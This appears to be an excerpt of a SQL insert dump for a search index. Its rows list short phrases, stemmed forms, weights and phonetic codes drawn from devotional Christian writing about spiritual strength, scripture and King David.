(298116, 'the real you', 'the real you', 0, 1, 1.4, 'T640', 1, '*'),
(298117, 'the ring', 'the ring', 0, 1, 1.2667, 'T652', 1, '*'),
(298118, 'the ring and', 'the ring and', 0, 1, 1.4, 'T65253', 1, '*'),
(298119, 'the scripture says', 'the scripture says', 0, 1, 1.6, 'T261362', 1, '*'),
(298120, 'the soul is', 'the soul is', 0, 1, 1.3667, 'T242', 1, '*'),
(298121, 'the spirit causes', 'the spirit causes', 0, 1, 1.5667, 'T21632', 1, '*'),
(298122, 'the spirit is', 'the spirit is', 0, 1, 1.4333, 'T21632', 1, '*'),
(298123, 'the spirit side', 'the spirit side', 0, 1, 1.5, 'T216323', 1, '*'),
(298124, 'the spiritual side', 'the spiritual side', 0, 1, 1.6, 'T2163423', 1, '*'),
(298125, 'the strength of', 'the strength of', 0, 1, 1.5, 'T2365231', 2, '*'),
(298126, 'the stronger and', 'the stronger and', 0, 1, 1.5333, 'T23652653', 1, '*'),
(298127, 'the time you', 'the time you', 0, 1, 1.4, 'T500', 1, '*'),
(298128, 'the word confess', 'the word confess', 0, 1, 1.5333, 'T632512', 1, '*'),
(298129, 'the word declare', 'the word declare', 0, 1, 1.5333, 'T63246', 1, '*'),
(298130, 'the word doing', 'the word doing', 0, 1, 1.4667, 'T6352', 1, '*'),
(298131, 'the word read', 'the word read', 0, 1, 1.4333, 'T6363', 1, '*'),
(298132, 'the word soak', 'the word soak', 0, 1, 1.4333, 'T632', 1, '*'),
(298133, 'the word speak', 'the word speak', 0, 1, 1.4667, 'T63212', 1, '*'),
(298134, 'the word think', 'the word think', 0, 1, 1.4667, 'T6352', 1, '*'),
(298135, 'their decisions', 'their decisions', 0, 1, 1.5, 'T63252', 1, '*'),
(298136, 'their decisions are', 'their decisions are', 0, 1, 1.6333, 'T632526', 1, '*'),
(298137, 'then you have', 'then you have', 0, 1, 1.4333, 'T510', 1, '*'),
(298138, 'therefore must', 'therefor must', 0, 1, 1.4667, 'T616523', 1, '*'),
(298139, 'therefore must take', 'therefor must take', 0, 1, 1.6333, 'T6165232', 1, '*'),
(298140, 'therefore your', 'therefor your', 0, 1, 1.4667, 'T616', 1, '*'),
(298141, 'therefore your spiritual', 'therefor your spiritual', 0, 1, 1.8, 'T61621634', 1, '*'),
(298142, 'these can', 'these can', 0, 1, 1.3, 'T250', 1, '*'),
(298143, 'these can take', 'these can take', 0, 1, 1.4667, 'T2532', 1, '*'),
(298144, 'these fellowships', 'these fellowships', 0, 1, 1.5667, 'T214212', 1, '*'),
(298145, 'these fellowships are', 'these fellowships are', 0, 1, 1.7, 'T2142126', 1, '*'),
(298146, 'these represent', 'these represent', 0, 1, 1.5, 'T2616253', 1, '*'),
(298147, 'these represent authority', 'these represent authority', 0, 1, 1.8333, 'T261625363', 1, '*'),
(298148, 'these will', 'these will', 0, 1, 1.3333, 'T240', 2, '*'),
(298149, 'these will fatten', 'these will fatten', 0, 1, 1.5667, 'T24135', 1, '*'),
(298150, 'these will sap', 'these will sap', 0, 1, 1.4667, 'T2421', 1, '*'),
(298151, 'things as', 'thing as', 0, 1, 1.3, 'T520', 1, '*'),
(298152, 'things as a', 'thing as a', 0, 1, 1.3667, 'T520', 1, '*'),
(298153, 'think on', 'think on', 0, 1, 1.2667, 'T525', 1, '*'),
(298154, 'think on the', 'think on the', 0, 1, 1.4, 'T5253', 1, '*'),
(298155, 'this that all', 'thi that all', 0, 1, 1.4333, 'T234', 1, '*'),
(298156, 'those two', 'those two', 0, 1, 1.3, 'T230', 1, '*'),
(298157, 'those two till', 'those two till', 0, 1, 1.4667, 'T234', 1, '*'),
(298158, 'throne and', 'throne and', 0, 1, 1.3333, 'T653', 1, '*'),
(298159, 'throne and the', 'throne and the', 0, 1, 1.4667, 'T653', 1, '*'),
(298160, 'through a lot', 'through a lot', 0, 1, 1.4333, 'T6243', 1, '*'),
(298161, 'through all till', 'through all till', 0, 1, 1.5333, 'T62434', 1, '*'),
(298162, 'through life certain', 'through life certain', 0, 1, 1.6667, 'T62412635', 1, '*'),
(298163, 'till he', 'till he', 0, 1, 1.2333, 'T400', 1, '*'),
(298164, 'till he sat', 'till he sat', 0, 1, 1.3667, 'T423', 1, '*'),
(298165, 'time to exercise', 'time to exercise', 0, 1, 1.5333, 'T53262', 1, '*'),
(298166, 'time to fellowship', 'time to fellowship', 0, 1, 1.6, 'T531421', 1, '*'),
(298167, 'time to worship', 'time to worship', 0, 1, 1.5, 'T53621', 1, '*'),
(298168, 'time to you', 'time to you', 0, 1, 1.3667, 'T530', 1, '*'),
(298169, 'time you', 'time you', 0, 1, 1.2667, 'T500', 2, '*'),
(298170, 'time you spend', 'time you spend', 0, 1, 1.4667, 'T52153', 1, '*'),
(298171, 'times but', 'time but', 0, 1, 1.3, 'T5213', 1, '*'),
(298172, 'times but because', 'time but because', 0, 1, 1.5667, 'T521312', 1, '*'),
(298173, 'to be constantly', 'to be constantly', 0, 1, 1.5333, 'T12523534', 1, '*'),
(298174, 'to be strengthened', 'to be strengthened', 0, 1, 1.6, 'T123652353', 1, '*'),
(298175, 'to be strong', 'to be strong', 0, 1, 1.4, 'T123652', 1, '*'),
(298176, 'to build', 'to build', 0, 1, 1.2667, 'T143', 1, '*'),
(298177, 'to build on', 'to build on', 0, 1, 1.3667, 'T1435', 1, '*'),
(298178, 'to exercise your', 'to exercise your', 0, 1, 1.5333, 'T2626', 1, '*'),
(298179, 'to fellowship', 'to fellowship', 0, 1, 1.4333, 'T1421', 1, '*'),
(298180, 'to fellowship with', 'to fellowship with', 0, 1, 1.6, 'T14213', 1, '*'),
(298181, 'to god\'s word', 'to god word', 0, 1, 1.4333, 'T23263', 1, '*'),
(298182, 'to lead your', 'to lead your', 0, 1, 1.4, 'T436', 1, '*'),
(298183, 'to neglect', 'to neglect', 0, 1, 1.3333, 'T52423', 1, '*'),
(298184, 'to neglect the', 'to neglect the', 0, 1, 1.4667, 'T52423', 1, '*'),
(298185, 'to strengthen', 'to strengthen', 0, 1, 1.4333, 'T2365235', 1, '*'),
(298186, 'to strengthen your', 'to strengthen your', 0, 1, 1.6, 'T23652356', 1, '*'),
(298187, 'to survive', 'to survive', 0, 1, 1.3333, 'T261', 2, '*'),
(298188, 'to survive open', 'to survive open', 0, 1, 1.5, 'T2615', 1, '*'),
(298189, 'to sustain a', 'to sustain a', 0, 1, 1.4, 'T235', 1, '*'),
(298190, 'to take care', 'to take care', 0, 1, 1.4, 'T260', 1, '*'),
(298191, 'to the father', 'to the father', 0, 1, 1.4333, 'T136', 1, '*'),
(298192, 'to worship', 'to worship', 0, 1, 1.3333, 'T621', 1, '*'),
(298193, 'to worship god', 'to worship god', 0, 1, 1.4667, 'T62123', 1, '*'),
(298194, 'to you because', 'to you because', 0, 1, 1.4667, 'T120', 1, '*'),
(298195, 'tripartite', 'tripartit', 0, 0, 0.6667, 'T6163', 1, '*'),
(298196, 'tripartite nature', 'tripartit nature', 0, 1, 1.5667, 'T6163536', 1, '*'),
(298197, 'tripartite nature there', 'tripartit nature there', 0, 1, 1.7667, 'T616353636', 1, '*'),
(298198, 'two till', 'two till', 0, 1, 1.2667, 'T400', 1, '*'),
(298199, 'two till next', 'two till next', 0, 1, 1.4333, 'T4523', 1, '*'),
(298200, 'understand that he', 'understand that he', 0, 1, 1.6, 'U5362353', 1, '*'),
(298201, 'up on', 'up on', 0, 1, 1.1667, 'U150', 1, '*'),
(298202, 'up on your', 'up on your', 0, 1, 1.3333, 'U156', 1, '*'),
(298203, 'up stronger', 'up stronger', 0, 1, 1.3667, 'U1236526', 1, '*'),
(298204, 'up stronger like', 'up stronger like', 0, 1, 1.5333, 'U123652642', 1, '*'),
(298205, 'up to god\'s', 'up to god', 0, 1, 1.3667, 'U13232', 1, '*'),
(298206, 'upon this', 'upon this', 0, 1, 1.3, 'U1532', 1, '*'),
(298207, 'upon this that', 'upon this that', 0, 1, 1.4667, 'U15323', 1, '*'),
(298208, 'upon which', 'upon which', 0, 1, 1.3333, 'U152', 1, '*'),
(298209, 'upon which all', 'upon which all', 0, 1, 1.4667, 'U1524', 1, '*'),
(298210, 'very precious', 'veri precious', 0, 1, 1.4333, 'V6162', 1, '*'),
(298211, 'very precious and', 'veri precious and', 0, 1, 1.5667, 'V616253', 1, '*'),
(298212, 'ways to strengthen', 'wai to strengthen', 0, 1, 1.6, 'W232365235', 1, '*'),
(298213, 'weak spirit', 'weak spirit', 0, 1, 1.3667, 'W2163', 1, '*'),
(298214, 'weak spirit cannot', 'weak spirit cannot', 0, 1, 1.6, 'W2163253', 1, '*'),
(298215, 'weak strong', 'weak strong', 0, 1, 1.3667, 'W23652', 1, '*'),
(298216, 'weak strong or', 'weak strong or', 0, 1, 1.4667, 'W236526', 1, '*'),
(298217, 'well-nourished', 'well-nourish', 0, 0, 0.9333, 'W45623', 1, '*'),
(298218, 'well-nourished strong', 'well-nourish strong', 0, 1, 1.7, 'W4562323652', 1, '*'),
(298219, 'well-nourished strong spirit', 'well-nourish strong spirit', 0, 1, 1.9333, 'W4562323652163', 1, '*'),
(298220, 'went through', 'went through', 0, 1, 1.4, 'W5362', 1, '*'),
(298221, 'went through a', 'went through a', 0, 1, 1.4667, 'W5362', 1, '*'),
(298222, 'were placed', 'were placed', 0, 1, 1.3667, 'W61423', 1, '*'),
(298223, 'were placed on', 'were placed on', 0, 1, 1.4667, 'W614235', 1, '*'),
(298224, 'what determine', 'what determine', 0, 1, 1.4667, 'W365', 1, '*'),
(298225, 'what determine how', 'what determine how', 0, 1, 1.6, 'W365', 1, '*'),
(298226, 'whether weak', 'whether weak', 0, 1, 1.4, 'W362', 1, '*'),
(298227, 'whether weak strong', 'whether weak strong', 0, 1, 1.6333, 'W3623652', 1, '*'),
(298228, 'which all', 'which all', 0, 1, 1.3, 'W240', 1, '*'),
(298229, 'which all other', 'which all other', 0, 1, 1.5, 'W2436', 1, '*'),
(298230, 'who can bear', 'who can bear', 0, 1, 1.4, 'W2516', 1, '*'),
(298231, 'who has a', 'who has a', 0, 1, 1.3, 'W200', 1, '*'),
(298232, 'will and emotions', 'will and emotions', 0, 1, 1.5667, 'W4535352', 1, '*'),
(298233, 'will be as', 'will be as', 0, 1, 1.3333, 'W412', 1, '*'),
(298234, 'will fatten', 'will fatten', 0, 1, 1.3667, 'W4135', 1, '*'),
(298235, 'will fatten your', 'will fatten your', 0, 1, 1.5333, 'W41356', 1, '*'),
(298236, 'will flow from', 'will flow from', 0, 1, 1.4667, 'W414165', 1, '*'),
(298237, 'will sap', 'will sap', 0, 1, 1.2667, 'W421', 1, '*'),
(298238, 'will sap out', 'will sap out', 0, 1, 1.4, 'W4213', 1, '*'),
(298239, 'will stand', 'will stand', 0, 1, 1.3333, 'W42353', 1, '*'),
(298240, 'will stand whether', 'will stand whether', 0, 1, 1.6, 'W423536', 1, '*'),
(298241, 'will sustain him', 'will sustain him', 0, 1, 1.5333, 'W4235', 1, '*'),
(298242, 'with god fellowship', 'with god fellowship', 0, 1, 1.6333, 'W3231421', 1, '*'),
(298243, 'with god if', 'with god if', 0, 1, 1.3667, 'W3231', 2, '*'),
(298244, 'with god\'s word', 'with god word', 0, 1, 1.5, 'W323263', 1, '*'),
(298245, 'with other', 'with other', 0, 1, 1.3333, 'W360', 1, '*'),
(298246, 'with other men', 'with other men', 0, 1, 1.4667, 'W365', 1, '*'),
(298247, 'with stronger', 'with stronger', 0, 1, 1.4333, 'W3236526', 1, '*'),
(298248, 'with stronger spirits', 'with stronger spirits', 0, 1, 1.7, 'W323652621632', 1, '*'),
(298249, 'with stupid', 'with stupid', 0, 1, 1.3667, 'W32313', 1, '*'),
(298250, 'with stupid and', 'with stupid and', 0, 1, 1.5, 'W3231353', 1, '*'),
(298251, 'word beloved', 'word beloved', 0, 1, 1.4, 'W631413', 1, '*'),
(298252, 'word beloved know', 'word beloved know', 0, 1, 1.5667, 'W63141325', 1, '*'),
(298253, 'word confess', 'word confess', 0, 1, 1.4, 'W632512', 1, '*'),
(298254, 'word confess the', 'word confess the', 0, 1, 1.5333, 'W6325123', 1, '*'),
(298255, 'word declare', 'word declare', 0, 1, 1.4, 'W63246', 1, '*'),
(298256, 'word declare the', 'word declare the', 0, 1, 1.5333, 'W632463', 1, '*'),
(298257, 'word doing', 'word doing', 0, 1, 1.3333, 'W6352', 1, '*'),
(298258, 'word doing these', 'word doing these', 0, 1, 1.5333, 'W635232', 1, '*'),
(298259, 'word fellowship', 'word fellowship', 0, 1, 1.5, 'W631421', 1, '*'),
(298260, 'word fellowship with', 'word fellowship with', 0, 1, 1.6667, 'W6314213', 1, '*'),
(298261, 'word hear', 'word hear', 0, 1, 1.3, 'W636', 1, '*'),
(298262, 'word hear the', 'word hear the', 0, 1, 1.4333, 'W6363', 1, '*'),
(298263, 'word read', 'word read', 0, 1, 1.3, 'W6363', 1, '*'),
(298264, 'word read the', 'word read the', 0, 1, 1.4333, 'W6363', 1, '*'),
(298265, 'word soak', 'word soak', 0, 1, 1.3, 'W632', 1, '*'),
(298266, 'word soak it', 'word soak it', 0, 1, 1.4, 'W6323', 1, '*'),
(298267, 'word speak', 'word speak', 0, 1, 1.3333, 'W63212', 1, '*'),
(298268, 'word speak the', 'word speak the', 0, 1, 1.4667, 'W632123', 1, '*'),
(298269, 'word that proceeds', 'word that proceeds', 0, 1, 1.6, 'W6316232', 1, '*'),
(298270, 'word think', 'word think', 0, 1, 1.3333, 'W6352', 1, '*'),
(298271, 'word think on', 'word think on', 0, 1, 1.4333, 'W63525', 1, '*'),
(298272, 'word to survive', 'word to survive', 0, 1, 1.5, 'W63261', 1, '*'),
(298273, 'work to strengthen', 'work to strengthen', 0, 1, 1.6, 'W6232365235', 1, '*'),
(298274, 'worship god builds', 'worship god builds', 0, 1, 1.6, 'W621231432', 1, '*'),
(298275, 'worship spending', 'worship spending', 0, 1, 1.5333, 'W621215352', 1, '*'),
(298276, 'worship spending time', 'worship spending time', 0, 1, 1.7, 'W62121535235', 1, '*'),
(298277, 'written “man', 'written “man', 0, 1, 1.4, 'W635', 1, '*'),
(298278, 'written “man shall', 'written “man shall', 0, 1, 1.6, 'W63524', 1, '*'),
(298279, 'you are more', 'you are more', 0, 1, 1.4, 'Y656', 1, '*'),
(298280, 'you because it', 'you because it', 0, 1, 1.4667, 'Y123', 1, '*'),
(298281, 'you beloved', 'you beloved', 0, 1, 1.3667, 'Y1413', 1, '*'),
(298282, 'you beloved building', 'you beloved building', 0, 1, 1.6667, 'Y141314352', 1, '*'),
(298283, 'you every human', 'you every human', 0, 1, 1.5, 'Y165', 1, '*'),
(298284, 'you over', 'you over', 0, 1, 1.2667, 'Y160', 1, '*'),
(298285, 'you over and', 'you over and', 0, 1, 1.4, 'Y1653', 1, '*'),
(298286, 'you spend', 'you spend', 0, 1, 1.3, 'Y2153', 1, '*'),
(298287, 'you spend to', 'you spend to', 0, 1, 1.4, 'Y2153', 1, '*'),
(298288, 'you stop', 'you stop', 0, 1, 1.2667, 'Y231', 1, '*'),
(298289, 'you stop being', 'you stop being', 0, 1, 1.4667, 'Y23152', 1, '*'),
(298290, 'you that communes', 'you that communes', 0, 1, 1.5667, 'Y3252', 1, '*'),
(298291, 'you therefore', 'you therefore', 0, 1, 1.4333, 'Y3616', 1, '*'),
(298292, 'you therefore must', 'you therefore must', 0, 1, 1.6, 'Y3616523', 1, '*'),
(298293, 'you through life', 'you through life', 0, 1, 1.5333, 'Y36241', 1, '*'),
(298294, 'your body and', 'your body and', 0, 1, 1.4333, 'Y61353', 1, '*'),
(298295, 'your conscience awakens', 'your conscience awakens', 0, 1, 1.7667, 'Y62525252', 1, '*'),
(298296, 'your inner', 'your inner', 0, 1, 1.3333, 'Y656', 1, '*'),
(298297, 'your inner man', 'your inner man', 0, 1, 1.4667, 'Y6565', 1, '*'),
(298298, 'your life depend', 'your life depend', 0, 1, 1.5333, 'Y6413153', 1, '*'),
(298299, 'your life has', 'your life has', 0, 1, 1.4333, 'Y6412', 1, '*'),
(298300, 'your most', 'your most', 0, 1, 1.3, 'Y6523', 1, '*'),
(298301, 'your most holy', 'your most holy', 0, 1, 1.4667, 'Y65234', 1, '*'),
(298302, 'your potency', 'your potency', 0, 1, 1.4, 'Y61352', 1, '*'),
(298303, 'your potency in', 'your potency in', 0, 1, 1.5, 'Y613525', 1, '*'),
(298304, 'your seat', 'your seat', 0, 1, 1.3, 'Y623', 1, '*'),
(298305, 'your seat of', 'your seat of', 0, 1, 1.4, 'Y6231', 1, '*'),
(298306, 'your soul and', 'your soul and', 0, 1, 1.4333, 'Y62453', 1, '*'),
(298307, 'your soul god\'s', 'your soul god', 0, 1, 1.5, 'Y624232', 1, '*'),
(298308, 'your spirit 5', 'your spirit 5', 0, 1, 1.4333, 'Y62163', 1, '*'),
(298309, 'your spirit and', 'your spirit and', 0, 1, 1.5, 'Y6216353', 1, '*'),
(298310, 'your spirit from', 'your spirit from', 0, 1, 1.5333, 'Y62163165', 1, '*'),
(298311, 'your spirit is', 'your spirit is', 0, 1, 1.4667, 'Y621632', 1, '*'),
(298312, 'your spirit man', 'your spirit man', 0, 1, 1.5, 'Y621635', 1, '*'),
(298313, 'your spirit matthew', 'your spirit matthew', 0, 1, 1.6333, 'Y6216353', 1, '*'),
(298314, 'your spirit must', 'your spirit must', 0, 1, 1.5333, 'Y62163523', 1, '*'),
(298315, 'your spirit needs', 'your spirit needs', 0, 1, 1.5667, 'Y62163532', 1, '*'),
(298316, 'your spirit spend', 'your spirit spend', 0, 1, 1.5667, 'Y621632153', 1, '*'),
(298317, 'your spirit the', 'your spirit the', 0, 1, 1.5, 'Y62163', 1, '*'),
(298318, 'your spirit will', 'your spirit will', 0, 1, 1.5333, 'Y621634', 1, '*'),
(298319, 'your spirit work', 'your spirit work', 0, 1, 1.5333, 'Y6216362', 1, '*'),
(298320, 'your spirit your', 'your spirit your', 0, 1, 1.5333, 'Y621636', 1, '*'),
(298321, 'your spiritual stance', 'your spiritual stance', 0, 1, 1.7, 'Y6216342352', 1, '*'),
(298322, 'yourselves up', 'yourselv up', 0, 1, 1.4333, 'Y624121', 1, '*'),
(298323, 'yourselves up on', 'yourselv up on', 0, 1, 1.5333, 'Y6241215', 1, '*'),
(298324, '“but he', '“but he', 0, 1, 1.2333, '“130', 1, '*'),
(298325, '“but he answered', '“but he answered', 0, 1, 1.5333, '“135263', 1, '*'),
(298326, '“but you', '“but you', 0, 1, 1.2667, '“130', 1, '*'),
(298327, '“but you beloved', '“but you beloved', 0, 1, 1.5333, '“131413', 1, '*'),
(298328, '“man', '“man', 0, 0, 0.2667, '“500', 1, '*'),
(298329, '“man shall', '“man shall', 0, 1, 1.3333, '“524', 1, '*'),
(298330, '“man shall not', '“man shall not', 0, 1, 1.4667, '“52453', 1, '*'),
(298331, '“the spirit', '“the spirit', 0, 1, 1.3667, '“32163', 1, '*'),
(298332, '“the spirit of', '“the spirit of', 0, 1, 1.4667, '“321631', 1, '*'),
(299310, '1 says', '1 says', 0, 1, 1.2, 'S000', 1, '*'),
(299311, '1 says now', '1 says now', 0, 1, 1.3333, 'S500', 1, '*'),
(299312, '10-14', '10-14', 0, 0, 0.5, '', 1, '*'),
(299313, '10-14 great', '10-14 great', 0, 1, 1.3667, 'G630', 1, '*'),
(299314, '10-14 great men', '10-14 great men', 0, 1, 1.5, 'G635', 1, '*'),
(299315, '11 the', '11 the', 0, 1, 1.2, 'T000', 1, '*'),
(299316, '11 the first', '11 the first', 0, 1, 1.4, 'T1623', 1, '*'),
(299317, '12 10-14', '12 10-14', 0, 1, 1.2667, '', 1, '*'),
(299318, '12 10-14 great', '12 10-14 great', 0, 1, 1.4667, 'G630', 1, '*'),
(299319, '13 1', '13 1', 0, 1, 1.1333, '', 1, '*'),
(299320, '13 1 says', '13 1 says', 0, 1, 1.3, 'S000', 1, '*'),
(299321, '13 22 however', '13 22 however', 0, 1, 1.4333, 'H160', 1, '*'),
(299322, '16 wrong', '16 wrong', 0, 1, 1.2667, 'W652', 1, '*'),
(299323, '16 wrong relationships', '16 wrong relationships', 0, 1, 1.7333, 'W6526435212', 1, '*'),
(299324, '19 41', '19 41', 0, 1, 1.1667, '', 1, '*'),
(299325, '19 41 44', '19 41 44', 0, 1, 1.2667, '', 1, '*'),
(299326, '2 sam', '2 sam', 0, 1, 1.1667, 'S500', 1, '*'),
(299327, '2 sam 11', '2 sam 11', 0, 1, 1.2667, 'S500', 1, '*'),
(299328, '2 sam 12', '2 sam 12', 0, 1, 1.2667, 'S500', 1, '*'),
(299329, '20 decision', '20 decision', 0, 1, 1.3667, 'D250', 1, '*'),
(299330, '20 decision if', '20 decision if', 0, 1, 1.4667, 'D251', 1, '*'),
(299331, '22 however', '22 however', 0, 1, 1.3333, 'H160', 1, '*'),
(299332, '22 however the', '22 however the', 0, 1, 1.4667, 'H163', 1, '*'),
(299333, '26 03', '26 03', 0, 1, 1.1667, '', 1, '*'),
(299334, '26 03 2017', '26 03 2017', 0, 1, 1.3333, '', 1, '*'),
(299335, '37', '37', 0, 0, 0.2, '', 1, '*'),
(299336, '37 from', '37 from', 0, 1, 1.2333, 'F650', 1, '*'),
(299337, '37 from our', '37 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(299338, '41 44', '41 44', 0, 1, 1.1667, '', 1, '*'),
(299339, '41 44 not', '41 44 not', 0, 1, 1.3, 'N300', 1, '*'),
(299340, '44 not', '44 not', 0, 1, 1.2, 'N300', 1, '*'),
(299341, '44 not recognising', '44 not recognising', 0, 1, 1.6, 'N3625252', 1, '*'),
(299342, '5 8', '5 8', 0, 1, 1.1, '', 1, '*'),
(299343, '5 8 the', '5 8 the', 0, 1, 1.2333, 'T000', 1, '*'),
(299344, '8 5', '8 5', 0, 1, 1.1, '', 1, '*'),
(299345, '8 5 8', '8 5 8', 0, 1, 1.1667, '', 1, '*'),
(299346, '8 the', '8 the', 0, 1, 1.1667, 'T000', 1, '*'),
(299347, '8 the city', '8 the city', 0, 1, 1.3333, 'T230', 1, '*'),
(299348, '80', '80', 0, 0, 0.2, '', 1, '*'),
(299349, '80 time', '80 time', 0, 1, 1.2333, 'T500', 1, '*'),
(299350, '80 time 20', '80 time 20', 0, 1, 1.3333, 'T500', 1, '*'),
(299351, 'a calendar', 'a calendar', 0, 1, 1.3333, 'A24536', 1, '*'),
(299352, 'a calendar of', 'a calendar of', 0, 1, 1.4333, 'A245361', 1, '*'),
(299353, 'a deep', 'a deep', 0, 1, 1.2, 'A310', 1, '*'),
(299354, 'a deep respect', 'a deep respect', 0, 1, 1.4667, 'A3162123', 1, '*'),
(299355, 'a man after', 'a man after', 0, 1, 1.3667, 'A5136', 1, '*'),
(299356, 'a man anointed', 'a man anointed', 0, 1, 1.4667, 'A530', 1, '*'),
(299357, 'a mess', 'a mess', 0, 1, 1.2, 'A520', 1, '*'),
(299358, 'a mess of', 'a mess of', 0, 1, 1.3, 'A521', 1, '*'),
(299359, 'a mess was', 'a mess was', 0, 1, 1.3333, 'A520', 1, '*'),
(299360, 'a mess will', 'a mess will', 0, 1, 1.3667, 'A524', 1, '*'),
(299361, 'a stipulated', 'a stipulated', 0, 1, 1.4, 'A23143', 1, '*'),
(299362, 'a stipulated period', 'a stipulated period', 0, 1, 1.6333, 'A23143163', 1, '*'),
(299363, 'a wise', 'a wise', 0, 1, 1.2, 'A200', 1, '*'),
(299364, 'a wise man', 'a wise man', 0, 1, 1.3333, 'A250', 1, '*'),
(299365, 'accomplished what', 'accomplish what', 0, 1, 1.5667, 'A251423', 1, '*'),
(299366, 'accomplished what you', 'accomplish what you', 0, 1, 1.7, 'A251423', 1, '*'),
(299367, 'act 13', 'act 13', 0, 1, 1.2, 'A230', 1, '*'),
(299368, 'act 13 22', 'act 13 22', 0, 1, 1.3, 'A230', 1, '*'),
(299369, 'acts works', 'act works', 0, 1, 1.3333, 'A23262', 1, '*'),
(299370, 'acts works ruins', 'act works ruins', 0, 1, 1.5333, 'A23262652', 1, '*'),
(299371, 'actually 80', 'actual 80', 0, 1, 1.3667, 'A234', 1, '*'),
(299372, 'actually 80 time', 'actual 80 time', 0, 1, 1.5333, 'A23435', 1, '*'),
(299373, 'added by', 'ad by', 0, 1, 1.2667, 'A310', 1, '*'),
(299374, 'added by yourself', 'ad by yourself', 0, 1, 1.5667, 'A316241', 1, '*'),
(299375, 'adultery', 'adulteri', 0, 0, 0.5333, 'A3436', 1, '*'),
(299376, 'adultery and', 'adulteri and', 0, 1, 1.4, 'A343653', 1, '*'),
(299377, 'adultery and cover', 'adulteri and cover', 0, 1, 1.6, 'A343653216', 1, '*'),
(299378, 'advanced in', 'advanc in', 0, 1, 1.3667, 'A315235', 1, '*'),
(299379, 'advanced in years', 'advanc in years', 0, 1, 1.5667, 'A31523562', 1, '*'),
(299380, 'after his', 'after his', 0, 1, 1.3, 'A1362', 1, '*'),
(299381, 'after his own', 'after his own', 0, 1, 1.4333, 'A13625', 1, '*'),
(299382, 'age', 'ag', 0, 0, 0.2, 'A200', 1, '*'),
(299383, 'age as', 'ag as', 0, 1, 1.2, 'A200', 1, '*'),
(299384, 'age as you', 'ag as you', 0, 1, 1.3333, 'A200', 1, '*'),
(299385, 'aging', 'ag', 0, 0, 0.3333, 'A252', 1, '*'),
(299386, 'aging because', 'ag because', 0, 1, 1.4333, 'A25212', 1, '*'),
(299387, 'aging because he', 'ag because he', 0, 1, 1.5333, 'A25212', 1, '*'),
(299388, 'also held', 'also held', 0, 1, 1.3, 'A4243', 1, '*'),
(299389, 'also held down', 'also held down', 0, 1, 1.4667, 'A42435', 1, '*'),
(299390, 'also targets', 'also targets', 0, 1, 1.4, 'A4236232', 1, '*'),
(299391, 'also targets this', 'also targets this', 0, 1, 1.5667, 'A423623232', 1, '*'),
(299392, 'althoughdavid', 'althoughdavid', 0, 0, 0.8667, 'A432313', 1, '*'),
(299393, 'althoughdavid came', 'althoughdavid came', 0, 1, 1.6, 'A43231325', 1, '*'),
(299394, 'althoughdavid came out', 'althoughdavid came out', 0, 1, 1.7333, 'A432313253', 1, '*'),
(299395, 'an understanding', 'an understanding', 0, 1, 1.5333, 'A536235352', 1, '*'),
(299396, 'an understanding of', 'an understanding of', 0, 1, 1.6333, 'A5362353521', 1, '*'),
(299397, 'and cover', 'and cover', 0, 1, 1.3, 'A53216', 1, '*'),
(299398, 'and cover up', 'and cover up', 0, 1, 1.4, 'A532161', 1, '*'),
(299399, 'and eliminate', 'and eliminate', 0, 1, 1.4333, 'A53453', 1, '*'),
(299400, 'and eliminate time', 'and eliminate time', 0, 1, 1.6, 'A534535', 1, '*'),
(299401, 'and god himself', 'and god himself', 0, 1, 1.5, 'A53235241', 1, '*'),
(299402, 'and not get', 'and not get', 0, 1, 1.3667, 'A535323', 1, '*'),
(299403, 'and procrastination', 'and procrastination', 0, 1, 1.6333, 'A53162623535', 1, '*'),
(299404, 'and procrastination everyday', 'and procrastination everyday', 0, 1, 1.9333, 'A53162623535163', 1, '*'),
(299405, 'and some you', 'and some you', 0, 1, 1.4, 'A5325', 1, '*'),
(299406, 'and the lord', 'and the lord', 0, 1, 1.4, 'A53463', 1, '*'),
(299407, 'and the whole', 'and the whole', 0, 1, 1.4333, 'A534', 1, '*'),
(299408, 'and there remains', 'and there remains', 0, 1, 1.5667, 'A53652', 1, '*'),
(299409, 'and unforgiveness', 'and unforgiveness', 0, 1, 1.5667, 'A535162152', 1, '*'),
(299410, 'and unforgiveness if', 'and unforgiveness if', 0, 1, 1.6667, 'A5351621521', 1, '*'),
(299411, 'anointed of', 'anoint of', 0, 1, 1.3667, 'A531', 1, '*'),
(299412, 'anointed of god', 'anoint of god', 0, 1, 1.5, 'A53123', 1, '*'),
(299413, 'are brought', 'ar brought', 0, 1, 1.3667, 'A61623', 1, '*'),
(299414, 'are brought by', 'ar brought by', 0, 1, 1.4667, 'A616231', 1, '*'),
(299415, 'are getting', 'ar getting', 0, 1, 1.3667, 'A62352', 1, '*'),
(299416, 'are getting older', 'ar getting older', 0, 1, 1.5667, 'A62352436', 1, '*'),
(299417, 'are not getting', 'ar not getting', 0, 1, 1.5, 'A6532352', 1, '*'),
(299418, 'are old advanced', 'ar old advanced', 0, 1, 1.5333, 'A6431523', 1, '*'),
(299419, 'are people god', 'ar people god', 0, 1, 1.4667, 'A61423', 1, '*'),
(299420, 'as a man', 'as a man', 0, 1, 1.2667, 'A250', 1, '*'),
(299421, 'as fast', 'as fast', 0, 1, 1.2333, 'A2123', 1, '*'),
(299422, 'as fast as', 'as fast as', 0, 1, 1.3333, 'A21232', 1, '*'),
(299423, 'as possible wrong', 'as possible wrong', 0, 1, 1.5667, 'A21214652', 1, '*'),
(299424, 'as you can', 'as you can', 0, 1, 1.3333, 'A250', 1, '*'),
(299425, 'as you grow', 'as you grow', 0, 1, 1.3667, 'A260', 2, '*'),
(299426, 'at god\'s', 'at god', 0, 1, 1.2667, 'A3232', 1, '*'),
(299427, 'at god\'s prophetic', 'at god prophetic', 0, 1, 1.6, 'A323216132', 1, '*'),
(299428, 'at old', 'at old', 0, 1, 1.2, 'A343', 1, '*'),
(299429, 'at old age', 'at old age', 0, 1, 1.3333, 'A3432', 1, '*'),
(299430, 'at the right', 'at the right', 0, 1, 1.4, 'A3623', 1, '*'),
(299431, 'authority but', 'author but', 0, 1, 1.4333, 'A36313', 1, '*'),
(299432, 'authority but when', 'author but when', 0, 1, 1.6, 'A363135', 1, '*'),
(299433, 'avoidable mistakes god', 'avoid mistakes god', 0, 1, 1.7333, 'A131452323', 1, '*'),
(299434, 'be a wise', 'be a wise', 0, 1, 1.3, 'B200', 1, '*'),
(299435, 'be done at', 'be done at', 0, 1, 1.3333, 'B353', 1, '*'),
(299436, 'be focused', 'be focused', 0, 1, 1.3333, 'B230', 1, '*'),
